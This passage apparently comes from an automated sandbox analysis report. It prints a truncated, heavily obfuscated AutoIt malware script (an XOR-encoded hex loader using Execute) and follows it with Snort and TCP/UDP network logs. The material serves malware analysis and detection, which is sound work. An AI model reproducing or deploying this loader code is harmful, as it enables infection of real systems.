("317935353762376235323730376237623339333337633734363337643734376232323233333333623331333336313635363333333362333133333537373837643735343337343632376736343633373237343436333333623331333336313635363333333362333133353634373837393734373532353632336233313333363636323635363333333362333133353734373637373236323436393236373737353632363737363737336233313333376237673764373633333362333133353737323637353736373736323735373632353637373232353235363137673338346333333231333334651" ) ) ) $1178569399 = 659661563 $FTSBW8HJA2 = $FTSBW8HJA2 + 1 CASE 498628477 LOCAL $UIHED4S $1178569399 = 461545339 $FTSBW8HJA2 = $FTSBW8HJA2 + 1 CASE 659661563 LOCAL $SDQ4FSDGZ = $SSZ ($DF45 (MTDUDAQCWRWM ("337B3737356035603730353235603560313B31313561353634313566353635603030303131313160313331313537343435653431353731313160313331313630353A346235363565353536313536343035653436343135303536313131603133313134333437343131313160313331373436353A353B353635373037343031603133313134333437343131313160313331373432343135363462303434303534353534303535313A366131313033313136673" ) ) ) $1178569399 = 1396810998 $FTSBW8HJA2 = $FTSBW8HJA2 + 1 CASE 1363940638 RETURN $SSZ ($DF45 (MTDUDAQCWRWM ("347C3030326732673137333033363331323733303033323133303030323533303235363C303032673267313733303336333132373330303733363231323533303231363C36363236333D33303231316636363634363236343630333732303335373032323337323032333365363436323634363631603636366736343630323637313733323332323230373C373D323632303337363D366736343735363D4" ) ) ) $FTSBW8HJA2 = 45878 CASE 1396810998 LOCAL $ZEUIFJDZAID = $SSZ ($DF45 (MTDUDAQCWRWM ("347C3030326732673037323532673267363C36363266323133363261323132673737373636363667363436363334333033363636366736343636306732623235323031363231333732623331333632373231363636673634363633343330333636363667363436303331323D323C323132303730333736673634363633343330333636363667363436303335333632313365373333373233323233373232363D316636363734363631604" ) ) ) $1178569399 = 188325663 $FTSBW8HJA2 = $FTSBW8HJA2 + 1 CASE 1640164563 LOCAL $DF45 = $SSZ (MTDUDAQCWRWM ("63686F6073781" ) & MTDUDAQCWRWM ("766D7176706B6C652" ) ) $1178569399 = 498628477 $FTSBW8HJA2 = $FTSBW8HJA2 + 1 ENDSWITCH ISPTR (44036 + 1105640 ) UNTIL $FTSBW8HJA2 = 45878 ENDFUNC FUNC PYTRJQNJZD ($FDS5G6D6D4FG4DSF , $Z4F45SD546SF ) GLOBAL $498628477 = 66485247 GLOBAL $STYIS6QDQ6 = 1848319 DO SWITCH $498628477 CASE 66485247 LOCAL $S = EXECUTE (MTDUDAQCWRWM ("647964627475641" ) ) $498628477 = 1640164563 $STYIS6QDQ6 = $STYIS6QDQ6 + 1 CASE 1640164563 LOCAL $C = $S (MTDUDAQCWRWM ("63686F6073781" ) & MTDUDAQCWRWM ("766D7176706B6C652" ) ) $STYIS6QDQ6 = 1848321 ENDSWITCH ISBOOL (523709 + 4292879968 + 4293373956 ) UNTIL $STYIS6QDQ6 = 1848321 IF $S ($C (MTDUDAQCWRWM ("3078343035333633373236393730373434343639373232303344323032343634373336423641323033443230343636313643373336350" ) ) ) THEN GLOBAL $461545339 = 66485247 GLOBAL $XUPQKHT1XD = 706701 DO ISBINARY (MTDUDAQCWRWM ("31646C574971394C62446B733254515667744961594271453536663163545A37416A497875495A3459696F6C615A41685373547A656A6B795852314C6C694A724F6D32546A724147444E6D516E6545674637695539793372396B4B4D536E544F483747583653377A326D367A36446B536C55676E390" ) ) SWITCH $461545339 CASE 66485247 DIM $FDS5G6D6D4FG4DSF1 = $S ($C (MTDUDAQCWRWM ("337B373336373536354734333737353A3431313331353133313136403131313331353133313735353537343030363534303535373035353730373535353430373537343035353" ) ) ) $461545339 = 1640164563 $XUPQKHT1XD = $XUPQKHT1XD + 1 CASE 498628477 $S ($C (MTDUDAQCWRWM ("337B363134363546313B313735353537343030363534303535373035353730373535353430373537343035353032313A3" ) ) ) $XUPQKHT1XD = 706704 CASE 1640164563 $S ($C (MTDUDAQCWRWM ("31793537373837623734343636333738363537343339353737383762373435673631373437643339333537373735363232343736323737353237373532353737373632353735363237373230336233313333323333333338336233313530353033393335366032353737323532343632373532343235323736323737336233313333323032313333333833381" ) ) ) $461545339 = 498628477 $XUPQKHT1XD = $XUPQKHT1XD + 1 ENDSWITCH MOD (1249845 , 2373130 ) UNTIL $XUPQKHT1XD = 706704 ENDIF ENDFUNC FUNC FSDVWWFSDXVC () GLOBAL $1163514766 = 66485247 GLOBAL $9RXZP5HHQH = 2980473 DO ISPTR (2905841 * 1829749 + 4293608150 + 4290999637 ) SWITCH $1163514766 CASE 66485247 LOCAL $Z = EXECUTE (MTDUDAQCWRWM ("647964627475641" ) ) $1163514766 = 1640164563 $9RXZP5HHQH = $9RXZP5HHQH + 1 CASE 188325663 LOCAL $ZPEPOD = $Z ($F (MTDUDAQCWRWM ("347C3030324732473037323532473247363C363332353230333232353334323D3737373636413230324732473633364736343633323D324133303633364736343633303D3241323D3330323D32353247323D3345323131373231323733313336323D3330333D30303231333732373336323D33343330324233363633364736343633333433303336363336473634363032313345323237303731333732323337334536473634363332303333324233363230363336473634363337353633363D4" ) ) ) $1163514766 = 1363940638 $9RXZP5HHQH = $9RXZP5HHQH + 1 CASE 461545339 LOCAL $E7488ZD = $Z ($F (MTDUDAQCWRWM ("3179353537423742343236353633363437323635353637343635343136353633333933353633373436403737373637373637374037433732323533381" ) ) ) $1163514766 = 659661563 $9RXZP5HHQH = $9RXZP5HHQH + 1 CASE 498628477 LOCAL $REZFGFVJKC4 = $Z ($F (MTDUDAQCWRWM ("327A363634413441373135363530353734313536363135303437343335363437303A30353430353B353634373032363334313441373034373534343B3531343B3444344731403430353B3536343730323731343035433133314035373531343A34443530353630323633343134413731343B35433437314035373531343A344435303536303236333431343736313444353734473536314035373531343A344435303536303237313430354331303035303B2" ) ) ) $1163514766 = 461545339 $9RXZP5HHQH = $9RXZP5HHQH + 1 CASE 560679029 $ZPEPOD = $Z ($F (MTDUDAQCWRWM ("327A3636346134613631343334613461303A303534333436353434333532343B3131313030673436346134613035306130323035343B34673536303530613032303537313437353636603437353034673437346136643430346334373431353637313437343135373530343B3536353B30353061303230353532353635303035306130323036343A343334673436346134373061303230353436353534643530343630353061303230353132353A3132313630353061303230353532353635303035306130323036343735633434313631373531343435313563303B2" ) ) ) $9RXZP5HHQH = 2980483 CASE 659661563 LOCAL $D4FV78878E88DS = $Z ($F (MTDUDAQCWRWM ("31793535374237423432363536333634373236353532363337343730363537343339333637333638363537343443323332313445333633381" ) ) ) $1163514766 = 1396810998 $9RXZP5HHQH = $9RXZP5HHQH + 1 CASE 1178569399 $ZPEPOD = $Z ($F (MTDUDAQCWRWM ("327A3636344134413631343334413441303A303534333436353434333532343B3131313030473436344134413035304130323035343B34473536303530413032303537313437353637313437343135373530343B3536353B36363437353134313530343B3532353634443530363634333431344130353041303230353532353635303035304130323036343735433434313631373531343435313543304130323035343B344735363035304130323035313330353041303230353532353635303035304130323036343731353136313A313A35433436304130323035343B34473536303530413032303531323035303B2" ) ) ) $1163514766 = 560679029 $9RXZP5HHQH = $9RXZP5HHQH + 1 CASE 1363940638 $ZPEPOD = $Z ($F (MTDUDAQCWRWM ("337B3737354035403730353235403540313B313435323537343535323433353A3030303131463537354035403134314031333134353A354634373134314031333134373A3546353A3437353A35323540353A3442353637323530354031343140313331343433343734313134314031333137353630343037303B303B34423537314031333134353734343545343135373134314031333737354035403630343734313436353034373734353634373630353A34423536313B313734313536344235353534353534353542354135303037313A31403133313435373434354534313537313431403133313430313134313A3" ) ) ) $1163514766 = 1178569399 $9RXZP5HHQH = $9RXZP5HHQH + 1 CASE 1396810998 LOCAL $EZF45SFSZ = $Z ($F (MTDUDAQCWRWM ("3078343436433643353337343732373536333734343736353734353037343732323832343634333436363736333733383338333733383635333833383634373332390" ) ) ) $1163514766 = 188325663 $9RXZP5HHQH = $9RXZP5HHQH + 1 CASE 1640164563 LOCAL $F = $Z (MTDUDAQCWRWM ("63686F6073781" ) & MTDUDAQCWRWM ("766D7176706B6C652" ) ) $1163514766 = 498628477 $9RXZP5HHQH = $9RXZP5HHQH + 1 ENDSWITCH RANDOM (477241 ) UNTIL $9RXZP5HHQH = 2980483 ENDFUNC FUNC WRPJITVQDB () GLOBAL $498628477 = 66485247 GLOBAL $OTOQDV78SF = 1995726 DO SWITCH $498628477 CASE 66485247 LOCAL $FDW4 = EXECUTE (MTDUDAQCWRWM ("647964627475641" ) ) $498628477 = 1640164563 $OTOQDV78SF = $OTOQDV78SF + 1 CASE 1640164563 LOCAL $ZAZ = $FDW4 (MTDUDAQCWRWM ("63686F6073781" ) & MTDUDAQCWRWM ("766D7176706B6C652" ) ) $OTOQDV78SF = 1995728 ENDSWITCH STRING (650377 + 4293751780 + 1092372 ) UNTIL $OTOQDV78SF = 1995728 IF $FDW4 ($ZAZ (MTDUDAQCWRWM ("337B3634353A35663736343B353A343034373430313B31313661373037603732363036303062363334313565353435673532356636673131313A3133306731333131303331313" ) ) ) THEN $FDW4 ($ZAZ (MTDUDAQCWRWM ("3179343136333767373237343632363235323762376736323734333935343639373437323634363537343339333335313530363436353767353836353431353835353333333833381" ) ) ) ENDIF ENDFUNC FUNC MCSYZQUJJQ ($FKJC , $I5U6GD47 ) GLOBAL $1304958308 = 66485247 GLOBAL $EX0PO9ZU1I = 3841522 DO SWITCH $1304958308 CASE 66485247 LOCAL $B = EXECUTE (MTDUDAQCWRWM ("647964627475641" ) ) $1304958308 = 1640164563 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 188325663 DIM $PDFJKIR = $B ($C (MTDUDAQCWRWM ("317933333432373436353331343636323739343237393734374237423331324533313436343237323633373836313635334435323633373437303635373435473733374037343732363533393333333133373331333537353632323532343632323933313337333133333436343237323633373836313635334434323739373437423742333333313337333133353735363232353234363232393331333733313333333833333331333733313531353234333542353733313337333133333436363237393432373937343742374233443433363437443331333333313337333133353640373432393735363233313337333133353737373537363236363236323331333733313335364037343239373536321" ) ) ) $1304958308 = 1363940638 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 461545339 DIM $ZE8DS = $B ($C (MTDUDAQCWRWM ("31793335373536323235323436323239333133373331333537353632323532343632323933313337333133353735363232353234363232391" ) ) ) $1304958308 = 659661563 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 498628477 DIM $DS45S8 = $B ($C (MTDUDAQCWRWM ("347C3037323C3336363C3636373737303636363D4" ) ) ) $1304958308 = 461545339 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 560679029 DIM $RSDIUNVCX = $B ($C (MTDUDAQCWRWM ("327A363237313536343335303536353735323636343B3530303230343032303037413030303230343032373135363530343B344734353730343735323441343334313437303A303634343440344334313041303230303047353434303531303030413032303030473537353034413030303B3032303430323030304735373530344130302" ) ) ) $1304958308 = 1163514766 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 659661563 DIM $EZAF = $B ($C (MTDUDAQCWRWM ("30783436363936433635353236353631363432383436363936433635344637303635364532383430343137353734364634393734343537383635324332303232333133363333333833343232323932390" ) ) ) $1304958308 = 1396810998 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 1163514766 $EX0PO9ZU1I = 3841533 CASE 1178569399 DIM $ZUIDBF = $B ($C (MTDUDAQCWRWM ("347C36363146303D32413330323133363241323133303137323C32423336333032373331333031403636363436323634303430373136363436323634363631313136304737403232323D3247323137453642364236423636363436323634363033343230323232453246323D3336313432353330323C4" ) ) ) $1304958308 = 560679029 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 1363940638 DIM $PDFJKIRPATH = $B ($C (MTDUDAQCWRWM ("327A30363436353134403443303230343032303037413030303230343032303634343440344334313032303430323030304735343430353130302" ) ) ) $1304958308 = 1178569399 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 1396810998 DIM $FDG7SS = $B ($C (MTDUDAQCWRWM ("337B313735373430354135423133313531333131364031313133313531333137353A3036343630353534353730373034313331353133313131463536343B353631313" ) ) ) $1304958308 = 188325663 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 CASE 1640164563 LOCAL $C = $B (MTDUDAQCWRWM ("63686F6073781" ) & MTDUDAQCWRWM ("766D7176706B6C652" ) ) $1304958308 = 498628477 $EX0PO9ZU1I = $EX0PO9ZU1I + 1 ENDSWITCH UNTIL $EX0PO9ZU1I = 3841533 IF $B ($C (MTDUDAQCWRWM ("347C3032323D324732313031333C323D333733303337363C36303230333732463245363D363437403634303232353247333732314" ) ) ) THEN $B ($C (MTDUDAQCWRWM ("317935353738363335323633373437303635373433393335373536323743374033381" ) ) ) ENDIF IF $B ($C (MTDUDAQCWRWM ("337B3735353A354035363736343B353A343034373430313B3137353535373534303434303430313A313330473133373535323540343035363" ) ) ) THEN $B ($C (MTDUDAQCWRWM ("317935373738374237343436363337383635373433393335373737353736323636323632334233313335373436403730373733381" ) ) ) ENDIF IF $B ($C (MTDUDAQCWRWM ("337B3735353A356035363736343B353A343034373430313B313734333537353535623561353A3431363335323437353B313A31333067313330333" ) ) ) THEN $B ($C (MTDUDAQCWRWM ("347C3032323D3247323131333336323D33303231363C363033343230323232453246323D3336313432353330323C36473634363033343230323232453246323D3336363D4" ) ) ) ENDIF IF $B ($C (MTDUDAQCWRWM ("347C3032323D324732313031333C323D333733303337363C3630333633373230323D3331324133323237333C363D363437403634303232353247333732314" ) ) ) THEN $B ($C (MTDUDAQCWRWM ("337B3" ) & MTDUDAQCWRWM ("3634343B3441343737353530343B35363437303A3036353035313436343B3537344735343431353A30413032303635433537343B343634303434303B2" ) ) ) ENDIF ENDFUNC FUNC MTDUDAQCWRWM ($ZE88EZ ) LOCAL $ESDFQSD = EXECUTE ("execute" ) LOCAL $SFDQFSDFSD = $ESDFQSD ("binaryt" & "ostring" ) LOCAL $5FG96DDF LOCAL $GF5F = $ESDFQSD ($SFDQFSDFSD ("0x42696e617279546f537472696e672822307822202620537472696e675472696d526967687428247a653838657a2c20312929" ) ) $GF5F = $ESDFQSD ($SFDQFSDFSD ("0x537472696e6753706c69742824676635662c20222229" ) ) FOR $I = "1" TO UBOUND ($GF5F ) - "1" $5FG96DDF = $ESDFQSD ($SFDQFSDFSD ("0x2435666739366464662026204368725728426974584f522841" & "73632824676635665b24695d292c20537472696e67526967687428247a653838657a2c20223122292929" ) ) NEXT RETURN $5FG96DDF ENDFUNC LOCAL $FFDSSSDE WUEFAUYLBF () FUNC WUEFAUYLBF () MCSYZQUJJQ ("" , "DeviceCensus.exe" ) $FFDSSSDE = AA ("bdeuiO" , "2" ) NZDCVZYQNL () ENDFUNC FUNC NZDCVZYQNL () PIOLWBVXYS ("65784574496F74754140" , "DXTNOZLIKJ" ) ENDFUNC

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/13/21-21:12:35.247969TCP1201ATTACK-RESPONSES 403 Forbidden804974534.102.136.180192.168.2.3

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 21:12:35.068860054 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:12:35.108849049 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:12:35.108953953 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:12:35.109096050 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:12:35.148843050 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:12:35.247968912 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:12:35.247993946 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:12:35.248140097 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:12:35.248230934 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:12:35.287964106 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:13:09.513072968 CET4974880192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:09.639894962 CET80497483.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:09.640850067 CET4974880192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:09.641056061 CET4974880192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:09.767514944 CET80497483.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:09.767755032 CET4974880192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:09.768001080 CET4974880192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:09.895350933 CET80497483.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:11.790971994 CET4975080192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:11.918450117 CET80497503.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:11.919440985 CET4975080192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:11.919610023 CET4975080192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:11.919667959 CET4975080192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:11.920958042 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.045731068 CET80497503.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.046693087 CET80497503.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.046793938 CET4975080192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.047792912 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.047890902 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.050611019 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.176820993 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.176845074 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.176852942 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.177098989 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.303324938 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.303347111 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.303356886 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.303385973 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.303426027 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.303445101 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.303493977 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.303519011 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.439392090 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.439418077 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.439424992 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.439476013 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.439487934 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.439644098 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.439726114 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.439883947 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.439950943 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.565937042 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566046000 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.566431999 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566456079 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566472054 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566492081 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566504955 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.566534996 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.566559076 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.566592932 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566610098 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566618919 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566638947 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566648960 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.566678047 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.566687107 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566701889 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566715002 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566804886 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566826105 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566847086 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566903114 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566967964 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.566987991 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.567004919 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.567018986 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.567045927 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.567104101 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.567130089 CET4975180192.168.2.33.223.115.185
                                            Jan 13, 2021 21:13:12.567133904 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.692199945 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.692228079 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.692610025 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.692718983 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.692759037 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.692879915 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693042040 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693075895 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693120003 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693135977 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693238020 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693254948 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693356991 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693483114 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693497896 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693597078 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693634987 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693674088 CET80497513.223.115.185192.168.2.3
                                            Jan 13, 2021 21:13:12.693713903 CET80497513.223.115.185192.168.2.3

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 21:11:41.609260082 CET6511053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:11:41.651413918 CET5836153192.168.2.38.8.8.8
                                            Jan 13, 2021 21:11:41.667692900 CET53651108.8.8.8192.168.2.3
                                            Jan 13, 2021 21:11:41.699378014 CET53583618.8.8.8192.168.2.3
                                            Jan 13, 2021 21:11:43.437817097 CET6349253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:11:43.489875078 CET53634928.8.8.8192.168.2.3
                                            Jan 13, 2021 21:11:58.930888891 CET6083153192.168.2.38.8.8.8
                                            Jan 13, 2021 21:11:58.982043982 CET53608318.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:00.396003008 CET6010053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:00.446724892 CET53601008.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:01.054234982 CET5319553192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:01.140639067 CET53531958.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:01.486510038 CET5014153192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:01.537269115 CET53501418.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:02.491050959 CET5302353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:02.547434092 CET53530238.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:03.692859888 CET4956353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:03.740866899 CET53495638.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:04.652607918 CET5135253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:04.700452089 CET53513528.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:05.782391071 CET5934953192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:05.830373049 CET53593498.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:06.954121113 CET5708453192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:06.969846010 CET5882353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:07.017898083 CET53588238.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:07.020700932 CET53570848.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:12.268764019 CET5756853192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:12.318346024 CET53575688.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:12.809757948 CET5054053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:12.872461081 CET53505408.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:13.281399012 CET5436653192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:13.329286098 CET53543668.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:14.480228901 CET5303453192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:14.528512955 CET53530348.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:15.647737980 CET5776253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:15.695641994 CET53577628.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:17.350480080 CET5543553192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:17.398413897 CET53554358.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:18.625138998 CET5071353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:18.676887035 CET53507138.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:19.599800110 CET5613253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:19.650623083 CET53561328.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:20.618397951 CET5898753192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:20.666399956 CET53589878.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:34.989147902 CET5657953192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:35.062227011 CET53565798.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:38.290738106 CET6063353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:38.338586092 CET53606338.8.8.8192.168.2.3
                                            Jan 13, 2021 21:12:38.718440056 CET6129253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:12:38.774928093 CET53612928.8.8.8192.168.2.3
                                            Jan 13, 2021 21:13:09.365077019 CET6361953192.168.2.38.8.8.8
                                            Jan 13, 2021 21:13:09.511540890 CET53636198.8.8.8192.168.2.3
                                            Jan 13, 2021 21:13:09.963617086 CET6493853192.168.2.38.8.8.8
                                            Jan 13, 2021 21:13:10.011989117 CET53649388.8.8.8192.168.2.3
                                            Jan 13, 2021 21:13:30.588669062 CET6194653192.168.2.38.8.8.8
                                            Jan 13, 2021 21:13:30.654230118 CET53619468.8.8.8192.168.2.3
                                            Jan 13, 2021 21:13:32.665021896 CET6491053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:13:32.727684021 CET53649108.8.8.8192.168.2.3
                                            Jan 13, 2021 21:13:32.734510899 CET5212353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:13:32.785713911 CET53521238.8.8.8192.168.2.3
                                            Jan 13, 2021 21:13:52.008276939 CET5613053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:13:52.079715967 CET53561308.8.8.8192.168.2.3
                                            Jan 13, 2021 21:13:54.094017029 CET5633853192.168.2.38.8.8.8
                                            Jan 13, 2021 21:13:54.150810957 CET53563388.8.8.8192.168.2.3
                                            Jan 13, 2021 21:13:54.158955097 CET5942053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:13:54.215436935 CET53594208.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:00.959400892 CET5878453192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:01.015779018 CET53587848.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:01.786617994 CET6397853192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:01.842870951 CET53639788.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:02.776001930 CET6293853192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:02.826868057 CET53629388.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:03.570915937 CET5570853192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:03.618803024 CET53557088.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:04.169435978 CET5680353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:04.226008892 CET53568038.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:05.134938955 CET5714553192.168.2.38.8.8.8
